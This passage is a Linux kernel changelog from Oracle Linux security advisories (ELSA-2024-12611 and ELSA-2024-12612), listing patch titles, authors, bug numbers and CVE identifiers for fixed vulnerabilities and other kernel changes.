- media: mxl5xx: Move xpt structures off stack (Nathan Chancellor)
- arm64: dts: hi3798cv200: fix the size of GICR (Yang Xiwen)
- arm64: tegra: Correct Tegra132 I2C alias (Krzysztof Kozlowski)
- ata: pata_legacy: make legacy_exit() work again (Sergey Shtylyov)
- neighbour: fix unaligned access to pneigh_entry (Qingfang DENG)
- nilfs2: fix use-after-free of timer for log writer thread (Ryusuke Konishi) [Orabug: 36753565] {CVE-2024-38583}
- fs/nilfs2: convert timers to use timer_setup() (Kees Cook)
- mmc: core: Do not force a retune before RPMB switch (Jorge Ramirez-Ortiz)
- binder: fix max_thread type inconsistency (Carlos Llamas)
- ALSA: timer: Set lower bound of start tick time (Takashi Iwai) [Orabug: 36753730] {CVE-2024-38618}
- ALSA: timer: Simplify timer hw resolution calls (Takashi Iwai)
- ipvlan: Dont Use skb->sk in ipvlan_process_v{4,6}_outbound (Yue Haibing) [Orabug: 36763552] {CVE-2024-33621}
- ipvlan: add ipvlan_route_v6_outbound() helper (Eric Dumazet) [Orabug: 36940543] {CVE-2023-52796}
- ipvlan: properly track tx_errors (Eric Dumazet)
- net: add DEV_STATS_READ() helper (Eric Dumazet)
- kconfig: fix comparison to constant symbols, 'm', 'n' (Masahiro Yamada)
- net:fec: Add fec_enet_deinit() (Xiaolei Wang)
- net: usb: smsc95xx: fix changing LED_SEL bit value updated from EEPROM (Parthiban Veerasooran)
- smsc95xx: use usbnet->driver_priv (Andre Edich)
- smsc95xx: remove redundant function arguments (Andre Edich)
- enic: Validate length of nl attributes in enic_set_vf_port (Roded Zats) [Orabug: 36763837] {CVE-2024-38659}
- dma-buf/sw-sync: don't enable IRQ from sync_print_obj() (Tetsuo Handa) [Orabug: 36763846] {CVE-2024-38780}
- net/mlx5e: Use rx_missed_errors instead of rx_dropped for reporting buffer exhaustion (Carolina Jubran)
- nvmet: fix ns enable/disable possible hang (Sagi Grimberg)
- spi: Don't mark message DMA mapped when no transfer in it is (Andy Shevchenko)
- netfilter: nfnetlink_queue: acquire rcu_read_lock() in instance_destroy_rcu() (Eric Dumazet) [Orabug: 36763571] {CVE-2024-36286}
- net: fec: avoid lock evasion when reading pps_enable (Wei Fang)
- net: fec: remove redundant variable 'inc' (Colin Ian King)
- virtio: delete vq in vp_find_vqs_msix() when request_irq() fails (Jiri Pirko) [Orabug: 36763588] {CVE-2024-37353}
- arm64: asm-bug: Add .align 2 to the end of __BUG_ENTRY (Jiangfeng Xiao) [Orabug: 36825259] {CVE-2024-39488}
- openvswitch: Set the skbuff pkt_type for proper pmtud support. (Aaron Conole)
- tcp: Fix shift-out-of-bounds in dctcp_update_alpha(). (Kuniyuki Iwashima) [Orabug: 36763592] {CVE-2024-37356}
- params: lift param_set_uint_minmax to common code (Sagi Grimberg)
- ipv6: sr: fix memleak in seg6_hmac_init_algo (Hangbin Liu) [Orabug: 36825263] {CVE-2024-39489}
- x86/kconfig: Select ARCH_WANT_FRAME_POINTERS again when UNWINDER_FRAME_POINTER=y (Masahiro Yamada)
- null_blk: Fix the WARNING: modpost: missing MODULE_DESCRIPTION() (Zhu Yanjun)
- media: cec: cec-api: add locking in cec_release() (Hans Verkuil)
- um: Fix the -Wmissing-prototypes warning for __switch_mm (Tiwei Bie)
- powerpc/pseries: Add failure related checks for h_get_mpp and h_get_ppp (Shrikanth Hegde)
- media: stk1160: fix bounds checking in stk1160_copy_video() (Dan Carpenter) [Orabug: 36763603] {CVE-2024-38621}
- um: Add winch to winch_handlers before registering winch IRQ (Roberto Sassu) [Orabug: 36768584] {CVE-2024-39292}
- um: Fix return value in ubd_init() (Duoming Zhou)
- Input: pm8xxx-vibrator - correct VIB_MAX_LEVELS calculation (Fenglin Wu)
- Input: ims-pcu - fix printf string overflow (Arnd Bergmann)
- libsubcmd: Fix parse-options memory leak (Ian Rogers)
- f2fs: add error prints for debugging mount failure (Sahitya Tummala)
- extcon: max8997: select IRQ_DOMAIN instead of depending on it (Randy Dunlap)
- ppdev: Add an error check in register_device (Huai-Yuan Liu) [Orabug: 36678065] {CVE-2024-36015}
- stm class: Fix a double free in stm_register_device() (Dan Carpenter) [Orabug: 36763764] {CVE-2024-38627}
- usb: gadget: u_audio: Clear uac pointer when freed. (Chris Wulff)
- greybus: arche-ctrl: move device table to its right location (Arnd Bergmann)
- serial: max3100: Fix bitwise types (Andy Shevchenko)
- serial: max3100: Update uart_driver_registered on driver removal (Andy Shevchenko) [Orabug: 36763815] {CVE-2024-38633}
- serial: max3100: Lock port->lock when calling uart_handle_cts_change() (Andy Shevchenko) [Orabug: 36763820] {CVE-2024-38634}
- firmware: dmi-id: add a release callback function (Arnd Bergmann)
- dmaengine: idma64: Add check for dma_set_max_seg_size (Chen Ni)
- greybus: lights: check return of get_channel_from_mode (Rui Miguel Silva) [Orabug: 36763833] {CVE-2024-38637}
- sched/fair: Allow disabling sched_balance_newidle with sched_relax_domain_level (Vitalii Bursov)
- sched/topology: Don't set SD_BALANCE_WAKE on cpuset domain relax (Valentin Schneider)
- af_packet: do not call packet_read_pending() from tpacket_destruct_skb() (Eric Dumazet)
- netrom: fix possible dead-lock in nr_rt_ioctl() (Eric Dumazet) [Orabug: 36753582] {CVE-2024-38589}
- RDMA/IPoIB: Fix format truncation compilation errors (Leon Romanovsky)
- RDMA/ipoib: Fix use of sizeof() (Kamal Heib)
- selftests/kcmp: remove unused open mode (Edward Liaw)
- selftests/kcmp: Make the test output consistent and clear (Gautam Menghani)
- ext4: avoid excessive credit estimate in ext4_tmpfile() (Jan Kara)
- x86/insn: Fix PUSH instruction in x86 instruction decoder opcode map (Adrian Hunter)
- ASoC: tracing: Export SND_SOC_DAPM_DIR_OUT to its value (Steven Rostedt)
- fbdev: sh7760fb: allow modular build (Randy Dunlap)
- media: radio-shark2: Avoid led_names truncations (Ricardo Ribalda)
- media: ngene: Add dvb_ca_en50221_init return value check (Aleksandr Burakov)
- powerpc/fsl-soc: hide unused const variable (Arnd Bergmann)
- drm/mediatek: Add 0 size check to mtk_drm_gem_obj (Justin Green) [Orabug: 36753415] {CVE-2024-38549}
- fbdev: shmobile: fix snprintf truncation (Arnd Bergmann)
- mtd: rawnand: hynix: fixed typo (Maxim Korotkov)
- ipv6: sr: fix invalid unregister error path (Hangbin Liu) [Orabug: 36753711] {CVE-2024-38612}
- ipv6: sr: fix incorrect unregister order (Hangbin Liu)
- ipv6: sr: add missing seg6_local_exit (Hangbin Liu)
- net: openvswitch: fix overwriting ct original tuple for ICMPv6 (Ilya Maximets) [Orabug: 36753463] {CVE-2024-38558}
- net: usb: smsc95xx: stop lying about skb->truesize (Eric Dumazet)
- af_unix: Fix data races in unix_release_sock/unix_stream_sendmsg (Breno Leitao) [Orabug: 36753600] {CVE-2024-38596}
- m68k: mac: Fix reboot hang on Mac IIci (Finn Thain)
- m68k/mac: Use '030 reset method on SE/30 (Finn Thain)
- m68k: Fix spinlock race in kernel thread creation (Michael Schmitz) [Orabug: 36753715] {CVE-2024-38613}
- net: usb: sr9700: stop lying about skb->truesize (Eric Dumazet)
- wifi: mwl8k: initialize cmd->addr[] properly (Dan Carpenter)
- scsi: qedf: Ensure the copied buf is NUL terminated (Bui Quang Minh) [Orabug: 36753468] {CVE-2024-38559}
- scsi: bfa: Ensure the copied buf is NUL terminated (Bui Quang Minh) [Orabug: 36753473] {CVE-2024-38560}
- Revert 'sh: Handle calling csum_partial with misaligned data' (Guenter Roeck)
- sh: kprobes: Merge arch_copy_kprobe() into arch_prepare_kprobe() (Geert Uytterhoeven)
- wifi: ar5523: enable proper endpoint verification (Nikita Zhandarovich) [Orabug: 36753486] {CVE-2024-38565}
- wifi: carl9170: add a proper sanity check for endpoints (Nikita Zhandarovich) [Orabug: 36753509] {CVE-2024-38567}
- macintosh/via-macii: Fix 'BUG: sleeping function called from invalid context' (Finn Thain)
- macintosh/via-macii, macintosh/adb-iop: Clean up whitespace (Finn Thain)
- m68k/mac: Add mutual exclusion for IOP interrupt polling (Finn Thain)
- macintosh/via-macii: Remove BUG_ON assertions (Finn Thain)
- wifi: ath10k: Fix an error code problem in ath10k_dbg_sta_write_peer_debug_trigger() (Su Hui)
- scsi: hpsa: Fix allocation size for Scsi_Host private data (Yuri Karpov)
- scsi: libsas: Fix the failure of adding phy with zero-address to port (Xingui Yang)
- ACPI: disable -Wstringop-truncation (Arnd Bergmann)
- irqchip/alpine-msi: Fix off-by-one in allocation error path (Zenghui Yu)
- scsi: ufs: core: Perform read back after disabling UIC_COMMAND_COMPL (Andrew Halaney)
- scsi: ufs: core: Perform read back after disabling interrupts (Andrew Halaney)
- scsi: ufs: qcom: Perform read back after writing reset bit (Andrew Halaney)
- wifi: ath10k: poll service ready message before failing (Baochen Qiang)
- nfsd: drop st_mutex before calling move_to_close_lru() (NeilBrown)
- null_blk: Fix missing mutex_destroy() at module removal (Zhu Yanjun)
- jffs2: prevent xattr node from overflowing the eraseblock (Ilya Denisyev) [Orabug: 36753652] {CVE-2024-38599}
- crypto: ccp - drop platform ifdef checks (Arnd Bergmann)
- parisc: add missing export of __cmpxchg_u8() (Al Viro)
- nilfs2: fix out-of-range warning (Arnd Bergmann)
- ecryptfs: Fix buffer size for tag 66 packet (Brian Kubisiak) [Orabug: 36753537] {CVE-2024-38578}
- firmware: raspberrypi: Use correct device for DMA mappings (Laurent Pinchart)
- crypto: bcm - Fix pointer arithmetic (Aleksandr Mishin) [Orabug: 36753542] {CVE-2024-38579}
- ASoC: da7219-aad: fix usage of device_get_named_child_node() (Pierre-Louis Bossart)
- ASoC: dt-bindings: rt5645: add cbj sleeve gpio property (Derek Fang)
- ASoC: rt5645: Fix the electric noise due to the CBJ contacts floating (Derek Fang)
- net: usb: qmi_wwan: add Telit FN920C04 compositions (Daniele Palmas)
- wifi: cfg80211: fix the order of arguments for trace events of the tx_rx_evt class (Igor Artemiev)
- tty: n_gsm: fix possible out-of-bounds in gsm0_receive() (Daniel Starke) [Orabug: 36678069] {CVE-2024-36016}
- nilfs2: fix potential hang in nilfs_detach_log_writer() (Ryusuke Konishi) [Orabug: 36753558] {CVE-2024-38582}
- nilfs2: fix unexpected freezing of nilfs_segctor_sync() (Ryusuke Konishi)
- ring-buffer: Fix a race between readers and resize checks (Petr Pavlu) [Orabug: 36753662] {CVE-2024-38601}
https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-12611
11.09.2024 03:00:00 oraclelinux [ELSA-2024-12612] Unbreakable Enterprise kernel-container security update (important)
[5.4.17-2136.335.4.el7]
- mm: memcg/slab: enable kmalloc-cg-<n> caches for x86_64. (Imran Khan) [Orabug: 36951041]
- printk: add kthread for long-running print (Stephen Brennan) [Orabug: 36456582]
- kdb: Use the passed prompt in kdb_position_cursor() (Douglas Anderson)
- driver core: Fix uevent_show() vs driver detach race (Dan Williams)
- pinctrl: ti: ti-iodelay: fix possible memory leak when pinctrl_enable() fails (Yang Yingliang)
- pinctrl: ti: ti-iodelay: Drop if block with always false condition (Uwe Kleine-Konig)
- pinctrl: single: fix possible memory leak when pinctrl_enable() fails (Yang Yingliang)
- pinctrl: core: fix possible memory leak when pinctrl_enable() fails (Yang Yingliang)
- ipvs: Avoid unnecessary calls to skb_is_gso_sctp (Ismael Luceno)
[5.4.17-2136.335.3.el7]
- MIPS: Octeon: Add PCIe link status check (Dave Kleikamp) [Orabug: 36947196]
[5.4.17-2136.335.2.el7]
- drm/amdgpu: Fix signedness bug in sdma_v4_0_process_trap_irq() (Dan Carpenter)
- net: relax socket state check at accept time. (Paolo Abeni)
- fsnotify: clear PARENT_WATCHED flags lazily (Amir Goldstein) [Orabug: 36922241]
- NFSD: Increase NFSD_MAX_OPS_PER_COMPOUND (Chuck Lever) [Orabug: 36908594]
- x86/cpu: Avoid cpuinfo-induced IPI pileups (Paul E. McKenney) [Orabug: 35773811]
[5.4.17-2136.335.1.el7]
- LTS tag: v5.4.280 (Alok Tiwari)
- i2c: rcar: bring hardware to known state when probing (Wolfram Sang)
- nilfs2: fix kernel bug on rename operation of broken directory (Ryusuke Konishi)
- tcp: avoid too many retransmit packets (Eric Dumazet)
- tcp: use signed arithmetic in tcp_rtx_probe0_timed_out() (Eric Dumazet)
- net: tcp: fix unexcepted socket die when snd_wnd is 0 (Menglong Dong)
- tcp: refactor tcp_retransmit_timer() (Eric Dumazet)
- SUNRPC: Fix RPC client cleaned up the freed pipefs dentries (felix)
- libceph: fix race between delayed_work() and ceph_monc_stop() (Ilya Dryomov)
- ALSA: hda/realtek: Limit mic boost on VAIO PRO PX (Edson Juliano Drosdeck)
- nvmem: meson-efuse: Fix return value of nvmem callbacks (Joy Chakraborty)
- hpet: Support 32-bit userspace (He Zhe)
- USB: core: Fix duplicate endpoint bug by clearing reserved bits in the descriptor (Alan Stern)
- usb: gadget: configfs: Prevent OOB read/write in usb_string_copy() (Lee Jones)
- USB: Add USB_QUIRK_NO_SET_INTF quirk for START BP-850k (WangYuli)
- USB: serial: option: add Rolling RW350-GL variants (Vanillan Wang)
- USB: serial: option: add Netprisma LCUK54 series modules (Mank Wang)
- USB: serial: option: add support for Foxconn T99W651 (Slark Xiao)
- USB: serial: option: add Fibocom FM350-GL (Bjorn Mork)
- USB: serial: option: add Telit FN912 rmnet compositions (Daniele Palmas)
- USB: serial: option: add Telit generic core-dump composition (Daniele Palmas)
- ARM: davinci: Convert comma to semicolon (Chen Ni)
- s390: Mark psw in __load_psw_mask() as __unitialized (Sven Schnelle)
- udp: Set SOCK_RCU_FREE earlier in udp_lib_get_port(). (Kuniyuki Iwashima)
- ppp: reject claimed-as-LCP but actually malformed packets (Dmitry Antipov)
- net: ethernet: lantiq_etop: fix double free in detach (Aleksander Jan Bajkowski)
- net: lantiq_etop: add blank line after declaration (Aleksander Jan Bajkowski)
- octeontx2-af: Fix incorrect value output on error path in rvu_check_rsrc_availability() (Aleksandr Mishin)
- tcp: fix incorrect undo caused by DSACK of TLP retransmit (Neal Cardwell)
- tcp: add TCP_INFO status for failed client TFO (Jason Baron)
- vfs: don't mod negative dentry count when on shrinker list (Brian Foster)
- fs/dcache: Re-use value stored to dentry->d_flags instead of re-reading (linke li)
- filelock: fix potential use-after-free in posix_lock_inode (Jeff Layton)
- nilfs2: fix incorrect inode allocation from reserved inodes (Ryusuke Konishi)
- nvme-multipath: find NUMA path only for online numa-node (Nilay Shroff)
- ALSA: hda/realtek: Enable headset mic of JP-IK LEAP W502 with ALC897 (Jian-Hong Pan)
- i2c: pnx: Fix potential deadlock warning from del_timer_sync() call in isr (Piotr Wojtaszczyk)
- media: dw2102: fix a potential buffer overflow (Mauro Carvalho Chehab)
- bnx2x: Fix multiple UBSAN array-index-out-of-bounds (Ghadi Elie Rahme)
- drm/amdgpu/atomfirmware: silence UBSAN warning (Alex Deucher)
- drm/nouveau: fix null pointer dereference in nouveau_connector_get_modes (Ma Ke)
- Revert 'mm/writeback: fix possible divide-by-zero in wb_dirty_limits(), again' (Jan Kara)
- fsnotify: Do not generate events for O_PATH file descriptors (Jan Kara)
- can: kvaser_usb: Explicitly initialize family in leafimx driver_info struct (Jimmy Assarsson)
- mm: optimize the redundant loop of mm_update_owner_next() (Jinliang Zheng)
- nilfs2: add missing check for inode numbers on directory entries (Ryusuke Konishi)
- nilfs2: fix inode number range checks (Ryusuke Konishi)
- inet_diag: Initialize pad field in struct inet_diag_req_v2 (Shigeru Yoshida)
- selftests: make order checking verbose in msg_zerocopy selftest (Zijian Zhang)
- selftests: fix OOM in msg_zerocopy selftest (Zijian Zhang)
- bonding: Fix out-of-bounds read in bond_option_arp_ip_targets_set() (Sam Sun)
- tcp_metrics: validate source addr length (Jakub Kicinski)
- UPSTREAM: tcp: fix DSACK undo in fast recovery to call tcp_try_to_open() (Neal Cardwell)
- net: tcp better handling of reordering then loss cases (Yuchung Cheng)
- tcp: add ece_ack flag to reno sack functions (Yousuk Seung)
- tcp: tcp_mark_head_lost is only valid for sack-tcp (zhang kai)
- s390/pkey: Wipe sensitive data on failure (Holger Dengler)
- jffs2: Fix potential illegal address access in jffs2_free_inode (Wang Yong)
- powerpc/xmon: Check cpu id in commands 'c#', 'dp#' and 'dx#' (Greg Kurz)
- orangefs: fix out-of-bounds fsid access (Mike Marshall)
- powerpc/64: Set _IO_BASE to POISON_POINTER_DELTA not 0 for CONFIG_PCI=n (Michael Ellerman)
- i2c: i801: Annotate apanel_addr as __ro_after_init (Heiner Kallweit)
- media: dvb-frontends: tda10048: Fix integer overflow (Ricardo Ribalda)
- media: s2255: Use refcount_t instead of atomic_t for num_channels (Ricardo Ribalda)
- media: dvb-frontends: tda18271c2dd: Remove casting during div (Ricardo Ribalda)
- net: dsa: mv88e6xxx: Correct check for empty list (Simon Horman)
- Input: ff-core - prefer struct_size over open coded arithmetic (Erick Archer)
- firmware: dmi: Stop decoding on broken entry (Jean Delvare)
- sctp: prefer struct_size over open coded arithmetic (Erick Archer)
- media: dw2102: Don't translate i2c read into write (Michael Bunk)
- drm/amd/display: Skip finding free audio for unknown engine_id (Alex Hung)
- drm/amdgpu: Initialize timestamp for some legacy SOCs (Ma Jun)
- scsi: qedf: Make qedf_execute_tmf() non-preemptible (John Meneghini)
- IB/core: Implement a limit on UMAD receive List (Michael Guralnik)
- media: dvb-usb: dib0700_devices: Add missing release_firmware() (Ricardo Ribalda)
- media: dvb: as102-fe: Fix as10x_register_addr packing (Ricardo Ribalda)
- drm/lima: fix shared irq handling on driver remove (Erico Nunes)
- LTS tag: v5.4.279 (Alok Tiwari)
- arm64: dts: rockchip: Add sound-dai-cells for RK3368 (Alex Bee)
- ARM: dts: rockchip: rk3066a: add #sound-dai-cells to hdmi node (Johan Jonker)
- tcp: Fix data races around icsk->icsk_af_ops. (Kuniyuki Iwashima)
- ipv6: Fix data races around sk->sk_prot. (Kuniyuki Iwashima)
- ipv6: annotate some data-races around sk->sk_prot (Eric Dumazet)
- nfs: Leave pages in the pagecache if readpage failed (Matthew Wilcox (Oracle))
- pwm: stm32: Refuse too small period requests (Uwe Kleine-Konig)
- mtd: spinand: macronix: Add support for serial NAND flash (Jaime Liao)
- ftruncate: pass a signed offset (Arnd Bergmann)
- ata: libata-core: Fix double free on error (Niklas Cassel)
- batman-adv: Don't accept TT entries for out-of-spec VIDs (Sven Eckelmann)
- drm/nouveau/dispnv04: fix null pointer dereference in nv17_tv_get_hd_modes (Ma Ke)
- drm/nouveau/dispnv04: fix null pointer dereference in nv17_tv_get_ld_modes (Ma Ke)
- hexagon: fix fadvise64_64 calling conventions (Arnd Bergmann)
- csky, hexagon: fix broken sys_sync_file_range (Arnd Bergmann)
- net: can: j1939: enhanced error handling for tightly received RTS messages in xtp_rx_rts_session_new (Oleksij Rempel)
- net: can: j1939: recover socket queue on CAN bus error during BAM transmission (Oleksij Rempel)
- net: can: j1939: Initialize unused data in j1939_send_one() (Shigeru Yoshida)
- tty: mcf: MCF54418 has 10 UARTS (Jean-Michel Hautbois)
- usb: atm: cxacru: fix endpoint checking in cxacru_bind() (Nikita Zhandarovich)
- usb: musb: da8xx: fix a resource leak in probe() (Dan Carpenter)
- usb: gadget: printer: SS+ support (Oliver Neukum)
- net: usb: ax88179_178a: improve link status logs (Jose Ignacio Tornos Martinez)
- iio: chemical: bme680: Fix sensor data read operation (Vasileios Amoiridis)
- iio: chemical: bme680: Fix overflows in compensate() functions (Vasileios Amoiridis)
- iio: chemical: bme680: Fix calibration data variable (Vasileios Amoiridis)
- iio: chemical: bme680: Fix pressure value output (Vasileios Amoiridis)
- iio: adc: ad7266: Fix variable checking bug (Fernando Yang)
- mmc: sdhci: Do not lock spinlock around mmc_gpio_get_ro() (Adrian Hunter)
- mmc: sdhci: Do not invert write-protect twice (Adrian Hunter)
- mmc: sdhci-pci: Convert PCIBIOS_* return codes to errnos (Ilpo Jarvinen)
- x86: stop playing stack games in profile_pc() (Linus Torvalds)
- gpio: davinci: Validate the obtained number of IRQs (Aleksandr Mishin)
- nvme: fixup comment for nvme RDMA Provider Type (Hannes Reinecke)
- soc: ti: wkup_m3_ipc: Send NULL dummy message instead of pointer message (Andrew Davis)
- media: dvbdev: Initialize sbuf (Ricardo Ribalda)
- ALSA: emux: improve patch ioctl data validation (Oswald Buddenhagen)
- net/dpaa2: Avoid explicit cpumask var allocation on stack (Dawei Li)
- net/iucv: Avoid explicit cpumask var allocation on stack (Dawei Li)
- mtd: partitions: redboot: Added conversion of operands to a larger type (Denis Arefev)
- drm/panel: ilitek-ili9881c: Fix warning with GPIO controllers that sleep (Laurent Pinchart)
- netfilter: nf_tables: fully validate NFT_DATA_VALUE on store to data registers (Pablo Neira Ayuso)
- parisc: use correct compat recv/recvfrom syscalls (Arnd Bergmann)
- sparc: fix old compat_sys_select() (Arnd Bergmann)
- net: phy: micrel: add Microchip KSZ 9477 to the device table (Enguerrand de Ribaucourt)
- net: phy: mchp: Add support for LAN8814 QUAD PHY (Divya Koppera)
- net: dsa: microchip: fix initial port flush problem (Tristram Ha)
- ASoC: fsl-asoc-card: set priv->pdev before using it (Elinor Montmasson)
- netfilter: nf_tables: validate family when identifying table via handle (Pablo Neira Ayuso)
- drm/amdgpu: fix UBSAN warning in kv_dpm.c (Alex Deucher)
- pinctrl: rockchip: fix pinmux reset in rockchip_pmx_set (Huang-Huang Bao)
- pinctrl: rockchip: fix pinmux bits for RK3328 GPIO3-B pins (Huang-Huang Bao)
- pinctrl: rockchip: fix pinmux bits for RK3328 GPIO2-B pins (Huang-Huang Bao)
- pinctrl: fix deadlock in create_pinctrl() when handling -EPROBE_DEFER (Hagar Hemdan)
- iio: dac: ad5592r: fix temperature channel scaling value (Marc Ferland)
- iio: dac: ad5592r: un-indent code-block for scale read (Alexandru Ardelean)
- iio: dac: ad5592r-base: Replace indio_dev->mlock with own device lock (Sergiu Cuciurean)
- x86/amd_nb: Check for invalid SMN reads (Yazen Ghannam)
- PCI: Add PCI_ERROR_RESPONSE and related definitions (Naveen Naidu)
- perf/core: Fix missing wakeup when waiting for context reference (Haifeng Xu)
- tracing: Add MODULE_DESCRIPTION() to preemptirq_delay_test (Jeff Johnson)
- arm64: dts: qcom: qcs404: fix bluetooth device address (Johan Hovold)
- ARM: dts: samsung: smdk4412: fix keypad no-autorepeat (Krzysztof Kozlowski)
- ARM: dts: samsung: exynos4412-origen: fix keypad no-autorepeat (Krzysztof Kozlowski)
- ARM: dts: samsung: smdkv310: fix keypad no-autorepeat (Krzysztof Kozlowski)
- i2c: ocores: set IACK bit after core is enabled (Grygorii Tertychnyi)
- gcov: add support for GCC 14 (Peter Oberparleiter)
- drm/radeon: fix UBSAN warning in kv_dpm.c (Alex Deucher)
- ACPICA: Revert 'ACPICA: avoid Info: mapping multiple BARs. Your kernel is fine.' (Raju Rangoju)
- dmaengine: ioatdma: Fix missing kmem_cache_destroy() (Nikita Shubin)
- regulator: core: Fix modpost error 'regulator_get_regmap' undefined (Biju Das)
- net: usb: rtl8150 fix unintiatilzed variables in rtl8150_get_link_ksettings (Oliver Neukum)
- netfilter: ipset: Fix suspicious rcu_dereference_protected() (Jozsef Kadlecsik)
- virtio_net: checksum offloading handling fix (Heng Qi)
- net/sched: act_api: fix possible infinite loop in tcf_idr_check_alloc() (David Ruth)
- net/sched: act_api: rely on rcu in tcf_idr_check_alloc (Pedro Tammela)
- netns: Make get_net_ns() handle zero refcount net (Yue Haibing)
- xfrm6: check ip6_dst_idev() return value in xfrm6_get_saddr() (Eric Dumazet)
- ipv6: prevent possible NULL dereference in rt6_probe() (Eric Dumazet)
- ipv6: prevent possible NULL deref in fib6_nh_init() (Eric Dumazet)
- netrom: Fix a memory leak in nr_heartbeat_expiry() (Gavrilov Ilia)
- cipso: fix total option length computation (Ondrej Mosnacek)
- mips: bmips: BCM6358: make sure CBR is correctly set (Christian Marangi)
- MIPS: Routerboard 532: Fix vendor retry check code (Ilpo Jarvinen)
- PCI/PM: Avoid D3cold for HP Pavilion 17 PC/1972 PCIe Ports (Mario Limonciello)
- udf: udftime: prevent overflow in udf_disk_stamp_to_time() (Roman Smirnov)
- usb: misc: uss720: check for incompatible versions of the Belkin F5U002 (Alex Henrie)
- powerpc/io: Avoid clang null pointer arithmetic warnings (Michael Ellerman)
- powerpc/pseries: Enforce hcall result buffer validity and size (Nathan Lynch)
- Bluetooth: ath3k: Fix multiple issues reported by checkpatch.pl (Uri Arev)
- scsi: qedi: Fix crash while reading debugfs attribute (Manish Rangankar)
- drop_monitor: replace spin_lock by raw_spin_lock (Wander Lairson Costa)
- batman-adv: bypass empty buckets in batadv_purge_orig_ref() (Eric Dumazet)
- selftests/bpf: Prevent client connect before server bind in test_tc_tunnel.sh (Alessandro Carminati (Red Hat))
- rcutorture: Fix rcu_torture_one_read() pipe_count overflow comment (Paul E. McKenney)
- i2c: at91: Fix the functionality flags of the slave-only interface (Jean Delvare)
- usb-storage: alauda: Check whether the media is initialized (Shichao Lai)
- greybus: Fix use-after-free bug in gb_interface_release due to race condition. (Sicong Huang)
- netfilter: nftables: exthdr: fix 4-byte stack OOB write (Florian Westphal)
- hugetlb_encode.h: fix undefined behaviour (34 << 26) (Matthias Goergens)
- tick/nohz_full: Don't abuse smp_call_function_single() in tick_setup_device() (Oleg Nesterov)
- nilfs2: fix potential kernel bug due to lack of writeback flag waiting (Ryusuke Konishi)
- intel_th: pci: Add Lunar Lake support (Alexander Shishkin)
- intel_th: pci: Add Meteor Lake-S support (Alexander Shishkin)
- intel_th: pci: Add Sapphire Rapids SOC support (Alexander Shishkin)
- intel_th: pci: Add Granite Rapids SOC support (Alexander Shishkin)
- intel_th: pci: Add Granite Rapids support (Alexander Shishkin)
- dmaengine: axi-dmac: fix possible race in remove() (Nuno Sa)
- PCI: rockchip-ep: Remove wrong mask on subsys_vendor_id (Rick Wertenbroek)
- ocfs2: fix races between hole punching and AIO+DIO (Su Yue)
- ocfs2: use coarse time for new created files (Su Yue)
- fs/proc: fix softlockup in __read_vmcore (Rik van Riel)
- vmci: prevent speculation leaks by sanitizing event in event_deliver() (Hagar Gamal Halim Hemdan)
- tracing/selftests: Fix kprobe event name test for .isra. 
functions (Steven Rostedt (Google)) - drm/exynos/vidi: fix memory leak in .get_modes() (Jani Nikula) - drivers: core: synchronize really_probe() and dev_uevent() (Dirk Behme) - ionic: fix use after netif_napi_del() (Taehee Yoo) - net/ipv6: Fix the RT cache flush via sysctl using a previous delay (Petr Pavlu) - net/mlx5e: Fix features validation check for tunneled UDP (non-VXLAN) packets (Gal Pressman) - tcp: fix race in tcp_v6_syn_recv_sock() (Eric Dumazet) - drm/bridge/panel: Fix runtime warning on panel bridge release (Adam Miotk) - drm/komeda: check for error-valued pointer (Amjad Ouled-Ameur) - liquidio: Adjust a NULL pointer handling path in lio_vf_rep_copy_packet (Aleksandr Mishin) - HID: logitech-dj: Fix memory leak in logi_dj_recv_switch_to_dj_mode() (Jose Exposito) - iommu: Return right value in iommu_sva_bind_device() (Lu Baolu) - iommu/amd: Fix sysfs leak in iommu init (Kun(llfl)) - HID: core: remove unnecessary WARN_ON() in implement() (Nikita Zhandarovich) - gpio: tqmx86: fix typo in Kconfig label (Gregor Herburger) - SUNRPC: return proper error from gss_wrap_req_priv (Chen Hanxiao) - Input: try trimming too long modalias strings (Dmitry Torokhov) - scsi: mpt3sas: Avoid test/set_bit() operating in non-allocated memory (Breno Leitao) - xhci: Apply broken streams quirk to Etron EJ188 xHCI host (Kuangyi Chiang) - xhci: Apply reset resume quirk to Etron EJ188 xHCI host (Kuangyi Chiang) - xhci: Set correct transferred length for cancelled bulk transfers (Mathias Nyman) - jfs: xattr: fix buffer overflow for invalid xattr (Greg Kroah-Hartman) - mei: me: release irq in mei_me_pci_resume error path (Tomas Winkler) - USB: class: cdc-wdm: Fix CPU lockup caused by excessive log messages (Alan Stern) - nilfs2: fix nilfs_empty_dir() misjudgment and long loop on I/O errors (Ryusuke Konishi) - nilfs2: return the mapped address from nilfs_get_page() (Matthew Wilcox (Oracle)) - nilfs2: Remove check for PageError (Matthew Wilcox (Oracle)) - selftests/mm: compaction_test: 
fix bogus test success on Aarch64 (Dev Jain) - selftests/mm: conform test to TAP format output (Muhammad Usama Anjum) - selftests/mm: compaction_test: fix incorrect write of zero to nr_hugepages (Dev Jain) - serial: sc16is7xx: fix bug in sc16is7xx_set_baud() when using prescaler (Hugo Villeneuve) - serial: sc16is7xx: replace hardcoded divisor value with BIT() macro (Hugo Villeneuve) - drm/amd/display: Handle Y carry-over in VCP X.Y calculation (George Shen) - ASoC: ti: davinci-mcasp: Fix race condition during probe (Joao Paulo Goncalves) - ASoC: ti: davinci-mcasp: Handle missing required DT properties (Peter Ujfalusi) - ASoC: ti: davinci-mcasp: Simplify the configuration parameter handling (Peter Ujfalusi) - ASoC: ti: davinci-mcasp: Remove legacy dma_request parsing (Peter Ujfalusi) - ASoC: ti: davinci-mcasp: Use platform_get_irq_byname_optional (Peter Ujfalusi) - ASoC: ti: davinci-mcasp: remove always zero of davinci_mcasp_get_dt_params (Zhang Qilong) - ASoC: ti: davinci-mcasp: remove redundant assignment to variable ret (Colin Ian King) - usb: gadget: f_fs: Fix race between aio_cancel() and AIO request complete (Wesley Cheng) - ipv6: fix possible race in __fib6_drop_pcpu_from() (Eric Dumazet) - af_unix: Annotate data-race of sk->sk_shutdown in sk_diag_fill(). (Kuniyuki Iwashima) - af_unix: Use skb_queue_len_lockless() in sk_diag_show_rqlen(). (Kuniyuki Iwashima) - af_unix: Use unix_recvq_full_lockless() in unix_stream_connect(). (Kuniyuki Iwashima) - af_unix: Annotate data-race of net->unx.sysctl_max_dgram_qlen. (Kuniyuki Iwashima) - af_unix: Annotate data-races around sk->sk_state in UNIX_DIAG. (Kuniyuki Iwashima) - af_unix: Annotate data-races around sk->sk_state in sendmsg() and recvmsg(). (Kuniyuki 